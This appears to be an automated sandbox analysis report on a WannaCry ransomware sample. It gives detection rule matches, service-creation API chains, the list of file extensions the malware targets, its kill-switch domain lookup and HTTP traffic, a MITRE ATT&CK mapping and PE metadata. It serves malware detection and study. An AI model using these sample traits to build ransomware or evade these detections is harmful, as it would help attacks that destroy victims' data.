          Source: 1.2.THN6clTA6P.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware_Gen date = 2017-05-12, hash3 = 4384bf4530fb2e35449a8e01c7e0ad94e3a25811ba94f7847c1e6612bbb45359, hash2 = 8e5b5841a3fe81cade259ce2a678ccb4451725bba71f6662d0cc1f08148da8df, hash1 = 9fe91d542952e145f2244572f314632d93eb1e8657621087b2ca7f7df2b0cb05, author = Florian Roth (based on rule by US CERT), description = Detects WannaCry Ransomware, reference = https://www.us-cert.gov/ncas/alerts/TA17-132A
          Source: 1.2.THN6clTA6P.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
          Source: 1.2.THN6clTA6P.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
          Source: 00000001.00000000.262558061.0000000000710000.00000002.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
          Source: 00000001.00000002.265724046.0000000000710000.00000002.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
          Source: THN6clTA6P.exeBinary or memory string: OriginalFilenamediskpart.exej% vs THN6clTA6P.exe
          Source: THN6clTA6P.exeBinary or memory string: OriginalFilenamelhdfrgui.exej% vs THN6clTA6P.exe
          Source: THN6clTA6P.exeStatic PE information: Resource name: R type: PE32 executable (GUI) Intel 80386, for MS Windows
          Source: THN6clTA6P.exeVirustotal: Detection: 88%
          Source: THN6clTA6P.exeMetadefender: Detection: 89%
          Source: THN6clTA6P.exeReversingLabs: Detection: 100%
          Source: C:\Users\user\Desktop\THN6clTA6P.exeCode function: 1_2_00408090 GetModuleFileNameA,__p___argc,OpenSCManagerA,InternetCloseHandle,OpenServiceA,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,StartServiceCtrlDispatcherA,1_2_00408090
          Source: THN6clTA6P.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\THN6clTA6P.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Users\user\Desktop\THN6clTA6P.exeCode function: 1_2_00407C40 sprintf,OpenSCManagerA,InternetCloseHandle,CreateServiceA,CloseServiceHandle,StartServiceA,CloseServiceHandle,CloseServiceHandle,1_2_00407C40
          Source: C:\Users\user\Desktop\THN6clTA6P.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
          Source: C:\Users\user\Desktop\THN6clTA6P.exeCode function: 1_2_00407CE0 InternetCloseHandle,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FindResourceA,LoadResource,LockResource,SizeofResource,sprintf,sprintf,sprintf,MoveFileExA,1_2_00407CE0
          Source: THN6clTA6P.exeBinary or memory string: @.der.pfx.key.crt.csr.p12.pem.odt.ott.sxw.stw.uot.3ds.max.3dm.ods.ots.sxc.stc.dif.slk.wb2.odp.otp.sxd.std.uop.odg.otg.sxm.mml.lay.lay6.asc.sqlite3.sqlitedb.sql.accdb.mdb.db.dbf.odb.frm.myd.myi.ibd.mdf.ldf.sln.suo.cs.c.cpp.pas.h.asm.js.cmd.bat.ps1.vbs.vb.pl.dip.dch.sch.brd.jsp.php.asp.rb.java.jar.class.sh.mp3.wav.swf.fla.wmv.mpg.vob.mpeg.asf.avi.mov.mp4.3gp.mkv.3g2.flv.wma.mid.m3u.m4u.djvu.svg.ai.psd.nef.tiff.tif.cgm.raw.gif.png.bmp.jpg.jpeg.vcd.iso.backup.zip.rar.7z.gz.tgz.tar.bak.tbk.bz2.PAQ.ARC.aes.gpg.vmx.vmdk.vdi.sldm.sldx.sti.sxi.602.hwp.snt.onetoc2.dwg.pdf.wk1.wks.123.rtf.csv.txt.vsdx.vsd.edb.eml.msg.ost.pst.potm.potx.ppam.ppsx.ppsm.pps.pot.pptm.pptx.ppt.xltm.xltx.xlc.xlm.xlt.xlw.xlsb.xlsm.xlsx.xls.dotx.dotm.dot.docm.docb.docx.docWANACRY!%s\%sCloseHandleDeleteFileWMoveFileExWMoveFileWReadFileWriteFileCreateFileWkernel32.dll
          Source: classification engineClassification label: mal100.rans.winEXE@1/0@1/1
          Source: C:\Users\user\Desktop\THN6clTA6P.exeCode function: sprintf,OpenSCManagerA,InternetCloseHandle,CreateServiceA,CloseServiceHandle,StartServiceA,CloseServiceHandle,CloseServiceHandle,1_2_00407C40
          Source: C:\Users\user\Desktop\THN6clTA6P.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\THN6clTA6P.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: THN6clTA6P.exeStatic file information: File size 3723293 > 1048576
          Source: THN6clTA6P.exeStatic PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x35b000
          Source: C:\Users\user\Desktop\THN6clTA6P.exeCode function: 1_2_00409860 push eax; ret 1_2_0040988E
          Source: C:\Users\user\Desktop\THN6clTA6P.exeCode function: 1_2_00407C40 sprintf,OpenSCManagerA,InternetCloseHandle,CreateServiceA,CloseServiceHandle,StartServiceA,CloseServiceHandle,CloseServiceHandle,1_2_00407C40
          Source: C:\Users\user\Desktop\THN6clTA6P.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_1-1145
          Source: C:\Users\user\Desktop\THN6clTA6P.exeAPI coverage: 9.3 %
          Source: C:\Users\user\Desktop\THN6clTA6P.exeCode function: GetAdaptersInfo,LocalAlloc,GetAdaptersInfo,LocalFree,inet_addr,inet_addr,inet_addr,htonl,htonl,htonl,htonl,GetPerAdapterInfo,LocalAlloc,GetPerAdapterInfo,inet_addr,htonl,htonl,htonl,htonl,LocalFree,LocalFree,1_2_00409160
          Source: C:\Users\user\Desktop\THN6clTA6P.exeAPI call chain: ExitProcess graph end nodegraph_1-1309
          Source: THN6clTA6P.exe, 00000001.00000002.266409095.0000000000C9A000.00000004.00000020.00020000.00000000.sdmp, THN6clTA6P.exe, 00000001.00000002.266400087.0000000000C8D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts2
          Service Execution          		4
          Windows Service          		4
          Windows Service          		1
          Software Packing          		OS Credential Dumping1
          Security Software Discovery          		Remote ServicesData from Local SystemExfiltration Over Other Network Medium1
          Encrypted Channel          		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
          Obfuscated Files or Information          		LSASS Memory1
          System Information Discovery          		Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth2
          Non-Application Layer Protocol          		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account Manager1
          Remote System Discovery          		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration2
          Application Layer Protocol          		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Binary PaddingNTDS1
          System Network Configuration Discovery          		Distributed Component Object ModelInput CaptureScheduled Transfer12
          Ingress Tool Transfer          		SIM Card SwapCarrier Billing Fraud

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          THN6clTA6P.exe89%VirustotalBrowse
          THN6clTA6P.exe89%MetadefenderBrowse
          THN6clTA6P.exe100%ReversingLabsWin32.Ransomware.WannaCry
          THN6clTA6P.exe100%AviraTR/Ransom.IZ
          THN6clTA6P.exe100%Joe Sandbox ML

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          1.2.THN6clTA6P.exe.7100a4.1.unpack100%AviraTR/Ransom.JBDownload File
          1.2.THN6clTA6P.exe.400000.0.unpack100%AviraTR/Ransom.JBDownload File
          1.0.THN6clTA6P.exe.7100a4.1.unpack100%AviraTR/Ransom.JBDownload File
          1.0.THN6clTA6P.exe.400000.0.unpack100%AviraTR/Ransom.JBDownload File

          Domains

          SourceDetectionScannerLabelLink
          www.ifferfsodp9ifjaposdfjhgosurijfaewrwergwea.com6%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://www.ifferfsodp9ifjaposdfjhgosurijfaewrwergwea.com/6%VirustotalBrowse
          http://www.ifferfsodp9ifjaposdfjhgosurijfaewrwergwea.com/100%Avira URL Cloudmalware
          http://www.ifferfsodp9ifjaposdfjhgosurijfaewrwergwea.com6%VirustotalBrowse
          http://www.ifferfsodp9ifjaposdfjhgosurijfaewrwergwea.com100%Avira URL Cloudmalware

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.ifferfsodp9ifjaposdfjhgosurijfaewrwergwea.com
          		104.21.68.165
          		truetrueunknown

          Contacted URLs

          NameMaliciousAntivirus DetectionReputation
          http://www.ifferfsodp9ifjaposdfjhgosurijfaewrwergwea.com/true
          • 6%, Virustotal, Browse
          • Avira URL Cloud: malware
          		unknown

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          http://www.ifferfsodp9ifjaposdfjhgosurijfaewrwergwea.comTHN6clTA6P.exetrue
          • 6%, Virustotal, Browse
          • Avira URL Cloud: malware
          		unknown

          World Map of Contacted IPs

          • No. of IPs < 25%
          • 25% < No. of IPs < 50%
          • 50% < No. of IPs < 75%
          • 75% < No. of IPs

          Public IPs

          IPDomainCountryFlagASNASN NameMalicious
          104.21.68.165
          		www.ifferfsodp9ifjaposdfjhgosurijfaewrwergwea.comUnited States
          		13335CLOUDFLARENETUStrue

          General Information

          Joe Sandbox Version:35.0.0 Citrine
          Analysis ID:694554
          Start date and time:2022-08-31 23:45:45 +02:00
          Joe Sandbox Product:CloudBasic
          Overall analysis duration:0h 6m 27s
          Hypervisor based Inspection enabled:false
          Report type:full
          Sample file name:THN6clTA6P.exe
          Cookbook file name:default.jbs
          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
          Number of analysed new started processes analysed:19
          Number of new started drivers analysed:0
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:0
          Technologies:
          • HCA enabled
          • EGA enabled
          • HDC enabled
          • AMSI enabled
          Analysis Mode:default
          Analysis stop reason:Timeout
          Detection:MAL
          Classification:mal100.rans.winEXE@1/0@1/1
          EGA Information:
          • Successful, ratio: 100%
          HDC Information:
          • Successful, ratio: 100% (good quality ratio 93.3%)
          • Quality average: 78.1%
          • Quality standard deviation: 28.8%
          HCA Information:
          • Successful, ratio: 100%
          • Number of executed functions: 3
          • Number of non-executed functions: 24
          Cookbook Comments:
          • Found application associated with file extension: .exe
          • Adjust boot time
          • Enable AMSI

          Warnings

          • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe
          • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, client.wns.windows.com, fs.microsoft.com, eudb.ris.api.iris.microsoft.com, ctldl.windowsupdate.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
          • Not all processes where analyzed, report is missing behavior information
          • Report size getting too big, too many NtQueryValueKey calls found.

          Simulations

          Behavior and APIs

          No simulations

          Joe Sandbox View / Context

          IPs

          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
          104.21.68.165XKMllmtgC6.exeGet hashmaliciousBrowse
          • www.ifferfsodp9ifjaposdfjhgosurijfaewrwergwea.com/
          TD2iJVEasE.exeGet hashmaliciousBrowse
          • www.ifferfsodp9ifjaposdfjhgosurijfaewrwergwea.com/
          G6wYYSew1q.dllGet hashmaliciousBrowse
          • www.ifferfsodp9ifjaposdfjhgosurijfaewrwergwea.com/

          Domains

          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
          www.ifferfsodp9ifjaposdfjhgosurijfaewrwergwea.comTD2iJVEasE.exeGet hashmaliciousBrowse
          • 104.21.68.165
          G6wYYSew1q.dllGet hashmaliciousBrowse
          • 104.21.68.165
          Rmz4QnOp0z.dllGet hashmaliciousBrowse
          • 172.67.196.228
          w.exeGet hashmaliciousBrowse
          • 172.106.0.71
          7.exeGet hashmaliciousBrowse
          • 172.106.0.71

          ASNs

          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
          CLOUDFLARENETUShttps://rfp-skytech.myportfolio.com/Get hashmaliciousBrowse
          • 104.18.11.207
          INV_PackingL_202208031_0104.exeGet hashmaliciousBrowse
          • 104.19.185.120
          fraiche_0831003.jsGet hashmaliciousBrowse
          • 162.159.135.233
          file.exeGet hashmaliciousBrowse
          • 188.114.97.3
          PURCHASE ORDER.exeGet hashmaliciousBrowse
          • 188.114.97.3
          FedEx.exeGet hashmaliciousBrowse
          • 188.114.96.3
          E-dekont.exeGet hashmaliciousBrowse
          • 23.227.38.74
          quotation.exeGet hashmaliciousBrowse
          • 104.19.185.120
          22D1530H.exeGet hashmaliciousBrowse
          • 162.159.135.233
          aZRjd3RCg7.exeGet hashmaliciousBrowse
          • 104.19.185.120
          1bvMFh26BM.exeGet hashmaliciousBrowse
          • 104.19.184.120
          STEEL-GI PHOTO FROM SMC STEEL GROUP CO.xlsxGet hashmaliciousBrowse
          • 104.19.185.120
          http://gogoanime.runGet hashmaliciousBrowse
          • 104.17.25.14
          E-tender 05-2022-Post Tender Clarification Form-Ms. NAFAL CONTRACTING TRADING CO LLC.xlsxGet hashmaliciousBrowse
          • 104.19.185.120
          ESTADO DE CUENTA DHL - 1606561674.exeGet hashmaliciousBrowse
          • 104.19.184.120
          Swift_010TRF-20223108.exeGet hashmaliciousBrowse
          • 104.19.184.120
          Ordem de compra.exeGet hashmaliciousBrowse
          • 104.19.184.120
          Nova ordem.exeGet hashmaliciousBrowse
          • 104.19.184.120
          https://sharepointeln-online.mfs.gg/aswm47BGet hashmaliciousBrowse
          • 172.67.74.85
          Egacid2z8g.exeGet hashmaliciousBrowse
          • 104.19.185.120

          JA3 Fingerprints

          No context

          Dropped Files

          No context

          Created / dropped Files

          No created / dropped files found

          Static File Info

          General

          File type:PE32 executable (GUI) Intel 80386, for MS Windows
          Entropy (8bit):7.964259281750754
          TrID:
          • Win32 Executable (generic) a (10002005/4) 99.96%
          • Generic Win/DOS Executable (2004/3) 0.02%
          • DOS Executable Generic (2002/1) 0.02%
          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
          File name:THN6clTA6P.exe
          File size:3723293
          MD5:3983f0ebeec88b8005724a203ae27180
          SHA1:9f34d48eae30b6da0a5c5297a873f989a49e10e8
          SHA256:ed492db95034ca288dd52df88e3ce3ec7b146ffd854a394ac187f0553ef966d9
          SHA512:8e9956ad6ec1ef73a3555eaebc1efd2bf51a1794af2ee06d6fce2aace5e197d949fc27a2c8a89d224655db486f91c494e11235021a5238e81da3495f0b17d320
          SSDEEP:98304:whqPoBhz1aRxcSUDk36SAEdhvxWa9P593R8yAVp2g30:whqPe1Cxcxk3ZAEUadzR8yc4gk
          TLSH:7B0633A8962DA1BCF0050DB044928557EBFB3C57B7BA5A2FCF4045660E43B6F9BC0E61
          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......U<S..]=..]=..]=.jA1..]=..A3..]=.~B7..]=.~B6..]=.~B9..]=..R`..]=..]<.J]=.'{6..]=..[;..]=.Rich.]=.........................PE..L..

          File Icon

          Icon Hash:00828e8e8686b000

          Static PE Info

          General

          Entrypoint:0x409a16
          Entrypoint Section:.text
          Digitally signed:false
          Imagebase:0x400000
          Subsystem:windows gui
          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          DLL Characteristics:
          Time Stamp:0x4CE78ECC [Sat Nov 20 09:03:08 2010 UTC]
          TLS Callbacks:
          CLR (.Net) Version:
          OS Version Major:4
          OS Version Minor:0
          File Version Major:4
          File Version Minor:0
          Subsystem Version Major:4
          Subsystem Version Minor:0
          Import Hash:9ecee117164e0b870a53dd187cdd7174

          Entrypoint Preview

          Instruction
          push ebp
          mov ebp, esp
          push FFFFFFFFh
          push 0040A1A0h
          push 00409BA2h
          mov eax, dword ptr fs:[00000000h]
          push eax
          mov dword ptr fs:[00000000h], esp
          sub esp, 68h
          push ebx
          push esi
          push edi
          mov dword ptr [ebp-18h], esp
          xor ebx, ebx
          mov dword ptr [ebp-04h], ebx
          push 00000002h
          call dword ptr [0040A0C0h]
          pop ecx
          or dword ptr [0070F894h], FFFFFFFFh
          or dword ptr [0070F898h], FFFFFFFFh
          call dword ptr [0040A0C8h]
          mov ecx, dword ptr [0070F88Ch]
          mov dword ptr [eax], ecx
          call dword ptr [0040A0CCh]
          mov ecx, dword ptr [0070F888h]
          mov dword ptr [eax], ecx
          mov eax, dword ptr [0040A0E4h]
          mov eax, dword ptr [eax]
          mov dword ptr [0070F890h], eax
          call 00007F77E0708F21h
          cmp dword ptr [00431410h], ebx
          jne 00007F77E0708E0Eh
          push 00409B9Eh
          call dword ptr [0040A0D4h]
          pop ecx
          call 00007F77E0708EF3h
          push 0040B010h
          push 0040B00Ch
          call 00007F77E0708EDEh
          mov eax, dword ptr [0070F884h]
          mov dword ptr [ebp-6Ch], eax
          lea eax, dword ptr [ebp-6Ch]
          push eax
          push dword ptr [0070F880h]
          lea eax, dword ptr [ebp-64h]
          push eax
          lea eax, dword ptr [ebp-70h]
          push eax
          lea eax, dword ptr [ebp-60h]
          push eax
          call dword ptr [0040A0DCh]
          push 0040B008h
          push 0040B000h
          call 00007F77E0708EABh

          Rich Headers

          Programming Language:
          • [C++] VS98 (6.0) SP6 build 8804
          • [EXP] VC++ 6.0 SP5 build 8804

          Data Directories

          NameVirtual AddressVirtual Size Is in Section
          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
          IMAGE_DIRECTORY_ENTRY_IMPORT0xa1e00xa0.rdata
          IMAGE_DIRECTORY_ENTRY_RESOURCE0x3100000x35a454.rsrc
          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
          IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
          IMAGE_DIRECTORY_ENTRY_IAT0xa0000x188.rdata
          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

          Sections

          NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
          .text0x10000x8bca0x9000False0.5344509548611112data6.134590828123831IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          .rdata0xa0000x9980x1000False0.29345703125data3.503615586181224IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
          .data0xb0000x30489c0x27000unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          .rsrc0x3100000x35a4540x35b000unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

          Resources

          NameRVASizeTypeLanguageCountry
          R0x3100a40x35a000PE32 executable (GUI) Intel 80386, for MS WindowsEnglishUnited States
          RT_VERSION0x66a0a40x3b0dataEnglishUnited States

          Imports

          DLLImport
          KERNEL32.dllWaitForSingleObject, InterlockedIncrement, GetCurrentThreadId, GetCurrentThread, ReadFile, GetFileSize, CreateFileA, MoveFileExA, SizeofResource, TerminateThread, LoadResource, FindResourceA, GetProcAddress, GetModuleHandleW, ExitProcess, GetModuleFileNameA, LocalFree, LocalAlloc, CloseHandle, InterlockedDecrement, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSection, GlobalAlloc, GlobalFree, QueryPerformanceFrequency, QueryPerformanceCounter, GetTickCount, LockResource, Sleep, GetStartupInfoA, GetModuleHandleA
          ADVAPI32.dllStartServiceCtrlDispatcherA, RegisterServiceCtrlHandlerA, ChangeServiceConfig2A, SetServiceStatus, OpenSCManagerA, CreateServiceA, CloseServiceHandle, StartServiceA, CryptGenRandom, CryptAcquireContextA, OpenServiceA
          WS2_32.dllclosesocket, recv, send, htonl, ntohl, WSAStartup, inet_ntoa, ioctlsocket, select, htons, socket, connect, inet_addr
          MSVCP60.dll??1_Lockit@std@@QAE@XZ, ??0_Lockit@std@@QAE@XZ
          iphlpapi.dllGetAdaptersInfo, GetPerAdapterInfo
          WININET.dllInternetOpenA, InternetOpenUrlA, InternetCloseHandle
          MSVCRT.dll__set_app_type, _stricmp, __p__fmode, __p__commode, _except_handler3, __setusermatherr, _initterm, __getmainargs, _acmdln, _adjust_fdiv, _controlfp, exit, _XcptFilter, _exit, _onexit, __dllonexit, free, ??2@YAPAXI@Z, _ftol, sprintf, _endthreadex, strncpy, rand, _beginthreadex, __CxxFrameHandler, srand, time, __p___argc

          Possible Origin

          Language of compilation systemCountry where language is spokenMap
          EnglishUnited States

          Network Behavior

          Snort IDS Alerts

          TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
          192.168.2.38.8.8.860625532024293 08/31/22-23:46:48.979040UDP2024293ET TROJAN Possible WannaCry DNS Lookup 26062553192.168.2.38.8.8.8
          104.21.68.165192.168.2.380497462016803 08/31/22-23:46:49.148342TCP2016803ET TROJAN Known Sinkhole Response Header8049746104.21.68.165192.168.2.3

          Network Port Distribution

          TCP Packets

          TimestampSource PortDest PortSource IPDest IP
          Aug 31, 2022 23:46:49.046582937 CEST4974680192.168.2.3104.21.68.165
          Aug 31, 2022 23:46:49.079365015 CEST8049746104.21.68.165192.168.2.3
          Aug 31, 2022 23:46:49.079502106 CEST4974680192.168.2.3104.21.68.165
          Aug 31, 2022 23:46:49.084465981 CEST4974680192.168.2.3104.21.68.165
          Aug 31, 2022 23:46:49.117137909 CEST8049746104.21.68.165192.168.2.3
          Aug 31, 2022 23:46:49.148341894 CEST8049746104.21.68.165192.168.2.3
          Aug 31, 2022 23:46:49.149030924 CEST4974680192.168.2.3104.21.68.165
          Aug 31, 2022 23:46:49.856214046 CEST4974680192.168.2.3104.21.68.165

          UDP Packets

          TimestampSource PortDest PortSource IPDest IP
          Aug 31, 2022 23:46:48.979039907 CEST6062553192.168.2.38.8.8.8
          Aug 31, 2022 23:46:49.004631042 CEST53606258.8.8.8192.168.2.3

          DNS Queries

          TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
          Aug 31, 2022 23:46:48.979039907 CEST192.168.2.38.8.8.80xb27cStandard query (0)www.ifferfsodp9ifjaposdfjhgosurijfaewrwergwea.comA (IP address)IN (0x0001)

          DNS Answers

          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
          Aug 31, 2022 23:46:49.004631042 CEST8.8.8.8192.168.2.30xb27cNo error (0)www.ifferfsodp9ifjaposdfjhgosurijfaewrwergwea.com104.21.68.165A (IP address)IN (0x0001)
          Aug 31, 2022 23:46:49.004631042 CEST8.8.8.8192.168.2.30xb27cNo error (0)www.ifferfsodp9ifjaposdfjhgosurijfaewrwergwea.com172.67.196.228A (IP address)IN (0x0001)

          HTTP Request Dependency Graph

          • www.ifferfsodp9ifjaposdfjhgosurijfaewrwergwea.com

          HTTP Packets

          Session IDSource IPSource PortDestination IPDestination PortProcess
          0192.168.2.349746104.21.68.16580C:\Users\user\Desktop\THN6clTA6P.exe
          TimestampkBytes transferredDirectionData
          Aug 31, 2022 23:46:49.084465981 CEST902OUTGET / HTTP/1.1
          Host: www.ifferfsodp9ifjaposdfjhgosurijfaewrwergwea.com
          Cache-Control: no-cache
          Aug 31, 2022 23:46:49.148341894 CEST903INHTTP/1.1 200 OK
          Date: Wed, 31 Aug 2022 21:46:49 GMT
          Content-Type: text/html;charset=UTF-8
          Content-Length: 113
          Connection: keep-alive
          x-sinkhole: sinkhole@blacklistthisdomain.com
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=BwAJjUBV7QoBfDcQC5xHuwWf6HaSer5urPutgRH%2BIhWdxjAnZxQhv3Lj7wdnu2PPlKacdGr9jV%2FTSwi3vI%2BYOhYgTU0rv1q0jFccnc7tRao14EgvdRHCOJyooOZRF5g5vft43xf7R9Y9%2BZ3RRpCsAmuUjh5Fhtj03GcJjYsFDcilY2Vk"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 7438f608df147765-LHR
          alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 42 6c 61 63 6b 4c 69 73 74 54 68 69 73 44 6f 6d 61 69 6e 20 2d 20 53 69 6e 6b 68 6f 6c 65 3c 2f 68 31 3e 0a 20 20 3c 70 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 68 61 73 20 62 65 65 6e 20 73 69 6e 6b 68 6f 6c 65 64 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e
          Data Ascii: <!DOCTYPE html><body> <h1>BlackListThisDomain - Sinkhole</h1> <p>This domain has been sinkholed.</p></body>


          Statistics

          CPU Usage

          Click to jump to process

          Memory Usage

          Click to jump to process

          System Behavior

          General

          Target ID:1
          Start time:23:46:47
          Start date:31/08/2022
          Path:C:\Users\user\Desktop\THN6clTA6P.exe
          Wow64 process (32bit):true
          Commandline:"C:\Users\user\Desktop\THN6clTA6P.exe"
          Imagebase:0x400000
          File size:3723293 bytes
          MD5 hash:3983F0EBEEC88B8005724A203AE27180
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Yara matches:
          • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000001.00000002.265600976.000000000040F000.00000008.00000001.01000000.00000005.sdmp, Author: Joe Security
          • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000001.00000000.262463921.000000000040F000.00000008.00000001.01000000.00000005.sdmp, Author: Joe Security
          • Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: 00000001.00000000.262558061.0000000000710000.00000002.00000001.01000000.00000005.sdmp, Author: us-cert code analysis team
          • Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: 00000001.00000002.265724046.0000000000710000.00000002.00000001.01000000.00000005.sdmp, Author: us-cert code analysis team
          Reputation:low

          Disassembly

          Reset < >

            Execution Graph

            Execution Coverage:2.5%
            Dynamic/Decrypted Code Coverage:0%
            Signature Coverage:19.2%
            Total number of Nodes:323
            Total number of Limit Nodes:5
